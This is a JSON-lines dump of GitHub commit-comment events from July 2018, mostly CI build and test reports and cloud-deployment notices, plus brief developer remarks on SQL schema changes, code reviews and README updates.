{"id":"7965239163","type":"CommitCommentEvent","actor":{"login":"cdzyp"},"repo":{"name":"cdzyp/token-profile"},"payload":{"comment":{"id":29707805,"position":null,"line":null,"path":null,"commit_id":"7e9f0f5fa5e7a4cf7b02d688aa427f40f32f3e58","created_at":"2018-07-14T05:16:56Z","updated_at":"2018-07-14T05:16:56Z","author_association":"OWNER","body":"![0xc711348eb06f6918f8eae66ce3fcf4747345d78e](https://user-images.githubusercontent.com/31403697/42721156-2a9177c0-8768-11e8-91a5-b2ae042c1435.png)\r\n"}},"created_at":"2018-07-14T05:16:56Z"}
{"id":"7965240984","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29707808,"position":null,"line":null,"path":null,"commit_id":"5b1ef4ed81e0be7656b9fcb6191d89419a0ce3b6","created_at":"2018-07-14T05:18:46Z","updated_at":"2018-07-14T05:18:46Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-051844 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-051844\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-14T05:18:46Z"}
{"id":"7965242538","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29707809,"position":null,"line":null,"path":null,"commit_id":"6f7182ac2c9a86ea0ce5d65bce60a8505467521f","created_at":"2018-07-14T05:20:24Z","updated_at":"2018-07-14T05:20:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-052022 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-052022\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-14T05:20:24Z"}
{"id":"7965243442","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707811,"position":null,"line":null,"path":null,"commit_id":"bb7f0ff864df4668cca79a066871fc4938d14662","created_at":"2018-07-14T05:21:14Z","updated_at":"2018-07-14T05:21:14Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (vidanovic) - i386-Windows-7-VisualStudio-14: OK (2940 of 2940 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bb7f0ff864df4668cca79a066871fc4938d14662-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bb7f0ff864df4668cca79a066871fc4938d14662-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T05:21:14Z"}
{"id":"7965252360","type":"CommitCommentEvent","actor":{"login":"stvhwrd"},"repo":{"name":"derfasthirnlosenick/euro-cup"},"payload":{"comment":{"id":29707827,"position":null,"line":null,"path":null,"commit_id":"b2153c25c595ba80af983f6ae975bbdf3e698d55","created_at":"2018-07-14T05:29:47Z","updated_at":"2018-07-14T05:29:47Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-14T05:29:47Z"}
{"id":"7965253816","type":"CommitCommentEvent","actor":{"login":"Cipherwraith"},"repo":{"name":"Cipherwraith/haskell-bitcoin-api"},"payload":{"comment":{"id":29707835,"position":null,"line":null,"path":null,"commit_id":"000d0ba1a7c660c5effa7821642f2cff221bf151","created_at":"2018-07-14T05:31:03Z","updated_at":"2018-07-14T05:31:03Z","author_association":"OWNER","body":"Made a mistake in the commit message. This is supposed to change \"getAccountBalance\" to \"getBalance\"."}},"created_at":"2018-07-14T05:31:03Z"}
{"id":"7965254700","type":"CommitCommentEvent","actor":{"login":"filteraction"},"repo":{"name":"filteraction/user-panel-lite"},"payload":{"comment":{"id":29707837,"position":null,"line":null,"path":null,"commit_id":"5f363d749f9a54344744051d257b8a4f791db68e","created_at":"2018-07-14T05:31:59Z","updated_at":"2018-07-14T05:31:59Z","author_association":"OWNER","body":"Nice plugin"}},"created_at":"2018-07-14T05:31:59Z"}
{"id":"7965257920","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707841,"position":null,"line":null,"path":null,"commit_id":"d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf","created_at":"2018-07-14T05:35:17Z","updated_at":"2018-07-14T05:35:17Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (Unknown) - x86_64-MacOS-10.9-clang: OK (2944 of 2944 tests passed, 11 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T05:35:17Z"}
{"id":"7965263088","type":"CommitCommentEvent","actor":{"login":"filteraction"},"repo":{"name":"filteraction/user-panel-lite"},"payload":{"comment":{"id":29707852,"position":null,"line":null,"path":null,"commit_id":"e8fca6e513572101f01772a20d7782f682046dff","created_at":"2018-07-14T05:40:36Z","updated_at":"2018-07-14T05:40:36Z","author_association":"OWNER","body":"readme.txt added"}},"created_at":"2018-07-14T05:40:36Z"}
{"id":"7965264667","type":"CommitCommentEvent","actor":{"login":"sowmyab"},"repo":{"name":"esnet/simple-lookup-service"},"payload":{"comment":{"id":29707856,"position":null,"line":null,"path":null,"commit_id":"a63282d7cfa714feeac2bb40b398196ef2866fdb","created_at":"2018-07-14T05:42:09Z","updated_at":"2018-07-14T05:42:09Z","author_association":"CONTRIBUTOR","body":"Also, modified Reverse Proxy url to use /sls-cache/ prefix"}},"created_at":"2018-07-14T05:42:09Z"}
{"id":"7965264981","type":"CommitCommentEvent","actor":{"login":"ian-luttrell"},"repo":{"name":"ian-luttrell/lamp-site"},"payload":{"comment":{"id":29707858,"position":null,"line":null,"path":null,"commit_id":"917ae45eed6aef1ceb15c568cf0b85c7356ac211","created_at":"2018-07-14T05:42:26Z","updated_at":"2018-07-14T05:42:26Z","author_association":"OWNER","body":"Also had to issue the following command to MySQL to make INSERT queries case-sensitive (previously, trying to register \"user\" would collide with an already registered \"USER\"):\r\n\r\nALTER TABLE test.users MODIFY COLUMN username VARCHAR(50) BINARY NOT NULL UNIQUE;\r\n\r\nShould also do this for hashed_password field as a best practice, but this is not necessary since the hashing takes case into account (effectively makes the column have type VARCHAR BINARY)."}},"created_at":"2018-07-14T05:42:26Z"}
{"id":"7965267841","type":"CommitCommentEvent","actor":{"login":"sowmyab"},"repo":{"name":"esnet/simple-lookup-service"},"payload":{"comment":{"id":29707867,"position":null,"line":null,"path":null,"commit_id":"61357836421821a0a6b49043fc0ce17a3884b153","created_at":"2018-07-14T05:45:10Z","updated_at":"2018-07-14T05:45:10Z","author_association":"CONTRIBUTOR","body":"Addresses issue #29 - secures sLS cache writes"}},"created_at":"2018-07-14T05:45:10Z"}
{"id":"7965268289","type":"CommitCommentEvent","actor":{"login":"ian-luttrell"},"repo":{"name":"ian-luttrell/lamp-site"},"payload":{"comment":{"id":29707872,"position":null,"line":null,"path":null,"commit_id":"917ae45eed6aef1ceb15c568cf0b85c7356ac211","created_at":"2018-07-14T05:45:34Z","updated_at":"2018-07-14T05:45:34Z","author_association":"OWNER","body":"NOTE: The column modification in the above comment makes the \"BINARY\" part of the SELECT query redundant. The present commit will be reverted by the next commit."}},"created_at":"2018-07-14T05:45:34Z"}
{"id":"7965271937","type":"CommitCommentEvent","actor":{"login":"JJRcop"},"repo":{"name":"Regalis11/Barotrauma"},"payload":{"comment":{"id":29707878,"position":null,"line":null,"path":null,"commit_id":"d0b61b3f0adb476f607238d30917a0d5437f629c","created_at":"2018-07-14T05:49:09Z","updated_at":"2018-07-14T05:49:09Z","author_association":"NONE","body":"Makeshift tether, I like it!"}},"created_at":"2018-07-14T05:49:09Z"}
{"id":"7965275889","type":"CommitCommentEvent","actor":{"login":"sowmyab"},"repo":{"name":"esnet/simple-lookup-service"},"payload":{"comment":{"id":29707884,"position":null,"line":null,"path":null,"commit_id":"925ed6bbf071de5c1a57e12872c7216f50a61ce2","created_at":"2018-07-14T05:52:35Z","updated_at":"2018-07-14T05:52:35Z","author_association":"CONTRIBUTOR","body":"spec file to include the apache rules file #41 "}},"created_at":"2018-07-14T05:52:35Z"}
{"id":"7965276390","type":"CommitCommentEvent","actor":{"login":"hackleberryfinn"},"repo":{"name":"hackleberryfinn/Global-Citizen-Hackleberry-Finn"},"payload":{"comment":{"id":29707885,"position":null,"line":null,"path":null,"commit_id":"4486fbcf928df10312308a712ae357fe42642870","created_at":"2018-07-14T05:52:58Z","updated_at":"2018-07-14T05:52:58Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/f3f56358-197d-4212-bb99-0d95d54bfc86?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/baf2eb90-00e5-408f-9f5d-d47769aab3be?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\") deployed [Global-Citizen-Hackleberry-Finn](https://github.com/hackleberryfinn/Global-Citizen-Hackleberry-Finn/releases/tag/deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180714-055257 \"deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180714-055257\") to [dev](https://console.bluemix.net/apps/8b984503-074c-42ab-b13c-92e494596da3?env_id=ibm:yp:us-south \"ibm:yp:us-south:luke.hutchinson@live.com.au:dev\"), including this commit"}},"created_at":"2018-07-14T05:52:58Z"}
{"id":"7965277631","type":"CommitCommentEvent","actor":{"login":"filteraction"},"repo":{"name":"filteraction/user-panel-lite"},"payload":{"comment":{"id":29707887,"position":null,"line":null,"path":null,"commit_id":"cddd877b13bd0f8312d82c768b5592b16287ae2a","created_at":"2018-07-14T05:54:01Z","updated_at":"2018-07-14T05:54:01Z","author_association":"OWNER","body":"readme.txt updated"}},"created_at":"2018-07-14T05:54:01Z"}
{"id":"7965278750","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707889,"position":null,"line":null,"path":null,"commit_id":"bb7f0ff864df4668cca79a066871fc4938d14662","created_at":"2018-07-14T05:55:06Z","updated_at":"2018-07-14T05:55:06Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (vidanovic) - Win64-Windows-7-VisualStudio-14: OK (2940 of 2940 tests passed, 13 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bb7f0ff864df4668cca79a066871fc4938d14662-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bb7f0ff864df4668cca79a066871fc4938d14662-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T05:55:06Z"}
{"id":"7965282260","type":"CommitCommentEvent","actor":{"login":"html5solo"},"repo":{"name":"TrustWallet/trust-ray"},"payload":{"comment":{"id":29707894,"position":null,"line":null,"path":null,"commit_id":"03770c44f0874f0904180ea9c5d106371b2cbc3a","created_at":"2018-07-14T05:58:34Z","updated_at":"2018-07-14T05:58:34Z","author_association":"NONE","body":"why do you disable \"showBalance\" ?"}},"created_at":"2018-07-14T05:58:34Z"}
{"id":"7965284858","type":"CommitCommentEvent","actor":{"login":"walterbender"},"repo":{"name":"sugarlabs/musicblocks"},"payload":{"comment":{"id":29707911,"position":null,"line":null,"path":null,"commit_id":"63fc06a9635c52111a1c9843f4465015015507bd","created_at":"2018-07-14T06:01:01Z","updated_at":"2018-07-14T06:01:01Z","author_association":"MEMBER","body":"I am not sure about some of the details. In particular, the transposition needs to be applied regardless of which temperament we are in. But I am not sure exactly how it would apply. Presumably D# + 1/2 step gets you to F, even if Fb is distinct from D#. I wouldn't worry about the movable bits at the moment."}},"created_at":"2018-07-14T06:01:01Z"}
{"id":"7965287836","type":"CommitCommentEvent","actor":{"login":"MunazR"},"repo":{"name":"k6yeung/ECE457A"},"payload":{"comment":{"id":29707913,"position":null,"line":null,"path":null,"commit_id":"17097a3eafe303729c89abae7e608bc892759e8d","created_at":"2018-07-14T06:03:43Z","updated_at":"2018-07-14T06:03:43Z","author_association":"NONE","body":"Solid runtime complexity"}},"created_at":"2018-07-14T06:03:43Z"}
{"id":"7965289101","type":"CommitCommentEvent","actor":{"login":"yuefei169"},"repo":{"name":"yuefei169/yuefei"},"payload":{"comment":{"id":29707916,"position":2,"line":2,"path":"README.md","commit_id":"20de7dedf762eeb6b9493b0ea3afef0acd7768aa","created_at":"2018-07-14T06:05:00Z","updated_at":"2018-07-14T06:05:00Z","author_association":"OWNER","body":"First: git clone https://github.com/MrZhangzhg/nsd2018.git\r\nLater: git pull"}},"created_at":"2018-07-14T06:05:00Z"}
{"id":"7965291237","type":"CommitCommentEvent","actor":{"login":"lucasMagallanes"},"repo":{"name":"lucasMagallanes/ProyectoAsistente"},"payload":{"comment":{"id":29707921,"position":null,"line":null,"path":null,"commit_id":"cf68a25dfc9b5724de4aaaf0806aa489f7cfda82","created_at":"2018-07-14T06:06:55Z","updated_at":"2018-07-14T06:06:55Z","author_association":"OWNER","body":"Se arreglo el alert que tiraba cuando despues de ingresar un usuario duplicado se ingresaba uno nuevo."}},"created_at":"2018-07-14T06:06:55Z"}
{"id":"7965292608","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29707924,"position":40,"line":40,"path":"GameTokens.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-14T06:08:10Z","updated_at":"2018-07-14T06:08:10Z","author_association":"NONE","body":"What does this do that the `public mapping` does not?"}},"created_at":"2018-07-14T06:08:10Z"}
{"id":"7965294074","type":"CommitCommentEvent","actor":{"login":"kshohei"},"repo":{"name":"kshohei/mymarkdown"},"payload":{"comment":{"id":29707931,"position":null,"line":null,"path":null,"commit_id":"02235282bc01d000ae5cefe3f0c4963ead1ffbba","created_at":"2018-07-14T06:09:36Z","updated_at":"2018-07-14T06:09:36Z","author_association":"OWNER","body":"aa"}},"created_at":"2018-07-14T06:09:36Z"}
{"id":"7965297999","type":"CommitCommentEvent","actor":{"login":"rarkins"},"repo":{"name":"npm/cli"},"payload":{"comment":{"id":29707938,"position":5,"line":19,"path":"package.json","commit_id":"f0a372b074cc43ee0e1be28dbbcef0d556b3b36c","created_at":"2018-07-14T06:13:22Z","updated_at":"2018-07-14T06:13:22Z","author_association":"NONE","body":"@zkat FYI, https://registry/npmjs.org/npm still returns the old npm/npm repo in the \"repository\" field when queried today, even though 6.2.0 was published with and shows this one instead."}},"created_at":"2018-07-14T06:13:22Z"}
{"id":"7965304836","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29707952,"position":null,"line":null,"path":null,"commit_id":"db62640c0e941a8fdc4b56a5365e6d01f201e145","created_at":"2018-07-14T06:19:34Z","updated_at":"2018-07-14T06:19:34Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/86/display/redirect) (on internal Jenkins) failed in stage 'Running XM tests on '10.9'' 🔥 : hudson.AbortException: Xamarin.Mac tests on macOS 10.12 failed (introspection)\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/86//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/db62640c0e941a8fdc4b56a5365e6d01f201e145/86/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/db62640c0e941a8fdc4b56a5365e6d01f201e145/86/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/db62640c0e941a8fdc4b56a5365e6d01f201e145/86/jenkins-results/generator-diff/index.html) (please review changes)\n🔥 [Xamarin.Mac tests on macOS 10.12 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/86/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.11 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/86/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.7 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/86/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.8 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/86/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.10 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/86/display/redirect) 🔥\n🔥 [Xamarin.Mac tests on macOS 10.9 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/86/display/redirect) 🔥\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/db62640c0e941a8fdc4b56a5365e6d01f201e145/86/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n1 tests failed, 160 tests passed.\n\n## Failed tests\n\n * introspection/iOS Unified 32-bits - simulator/Debug: Failed\n"}},"created_at":"2018-07-14T06:19:34Z"}
{"id":"7965314758","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29707970,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-14T06:28:57Z","updated_at":"2018-07-14T06:28:57Z","author_association":"NONE","body":"High residuals have always been an issue w/ high threaded tests.  The consensus was to disable autopurge and manage things manually.  It would be nice if autopurge could be modified on/off after a test is started."}},"created_at":"2018-07-14T06:28:57Z"}
{"id":"7965315409","type":"CommitCommentEvent","actor":{"login":"Iltifath"},"repo":{"name":"Iltifath/Alien-invasion-Game"},"payload":{"comment":{"id":29707973,"position":null,"line":null,"path":null,"commit_id":"e6e66ef84a35a022df1701a7fb93f9f50010bab6","created_at":"2018-07-14T06:29:40Z","updated_at":"2018-07-14T06:29:40Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-14T06:29:40Z"}
{"id":"7965315420","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707974,"position":null,"line":null,"path":null,"commit_id":"4d89755748773cfc357d0cbaf4f8e2cabc2c81fe","created_at":"2018-07-14T06:29:41Z","updated_at":"2018-07-14T06:29:41Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4d89755748773cfc357d0cbaf4f8e2cabc2c81fe-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T06:29:41Z"}
{"id":"7965316407","type":"CommitCommentEvent","actor":{"login":"IharVypau"},"repo":{"name":"IharVypau/or-2"},"payload":{"comment":{"id":29707979,"position":15,"line":15,"path":"eleventhLesson/script.js","commit_id":"50cea62698c5fb175fd6fdb172bb7aac9b36db07","created_at":"2018-07-14T06:30:31Z","updated_at":"2018-07-14T06:30:31Z","author_association":"OWNER","body":"Ты прав, тут небольшая ошибка, правильно было бы arr.join('').length == outputArr.join('').length"}},"created_at":"2018-07-14T06:30:31Z"}
{"id":"7965316815","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707980,"position":null,"line":null,"path":null,"commit_id":"a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce","created_at":"2018-07-14T06:30:57Z","updated_at":"2018-07-14T06:30:57Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T06:30:57Z"}
{"id":"7965316999","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707981,"position":null,"line":null,"path":null,"commit_id":"a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce","created_at":"2018-07-14T06:31:07Z","updated_at":"2018-07-14T06:31:07Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T06:31:07Z"}
{"id":"7965317261","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707982,"position":null,"line":null,"path":null,"commit_id":"a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce","created_at":"2018-07-14T06:31:22Z","updated_at":"2018-07-14T06:31:22Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-14T06:31:22Z"}
{"id":"7965317499","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707984,"position":null,"line":null,"path":null,"commit_id":"a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce","created_at":"2018-07-14T06:31:36Z","updated_at":"2018-07-14T06:31:36Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-14T06:31:36Z"}
{"id":"7965317704","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707985,"position":null,"line":null,"path":null,"commit_id":"a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce","created_at":"2018-07-14T06:31:48Z","updated_at":"2018-07-14T06:31:48Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T06:31:48Z"}
{"id":"7965318353","type":"CommitCommentEvent","actor":{"login":"wxy"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":29707991,"position":101,"line":71,"path":"translated/tech/20180606 6 Open Source AI Tools to Know.md","commit_id":"b828be613d682d143d030609e38f7ce475ae99bc","created_at":"2018-07-14T06:32:24Z","updated_at":"2018-07-14T06:32:24Z","author_association":"MEMBER","body":"@pityonline 同意。"}},"created_at":"2018-07-14T06:32:24Z"}
{"id":"7965318388","type":"CommitCommentEvent","actor":{"login":"yaofbgz"},"repo":{"name":"forezp/SpringcloudConfig"},"payload":{"comment":{"id":29707992,"position":null,"line":null,"path":null,"commit_id":"00d32612a38898781bce791a4a845e60a7fbdb4e","created_at":"2018-07-14T06:32:26Z","updated_at":"2018-07-14T06:32:26Z","author_association":"NONE","body":"foo = foo version 4"}},"created_at":"2018-07-14T06:32:26Z"}
{"id":"7965318561","type":"CommitCommentEvent","actor":{"login":"mastermaks11"},"repo":{"name":"mastermaks11/file"},"payload":{"comment":{"id":29707993,"position":null,"line":null,"path":null,"commit_id":"6f4b9de2d79790ecd193f6b689af577a7738dec0","created_at":"2018-07-14T06:32:36Z","updated_at":"2018-07-14T06:32:36Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-14T06:32:36Z"}
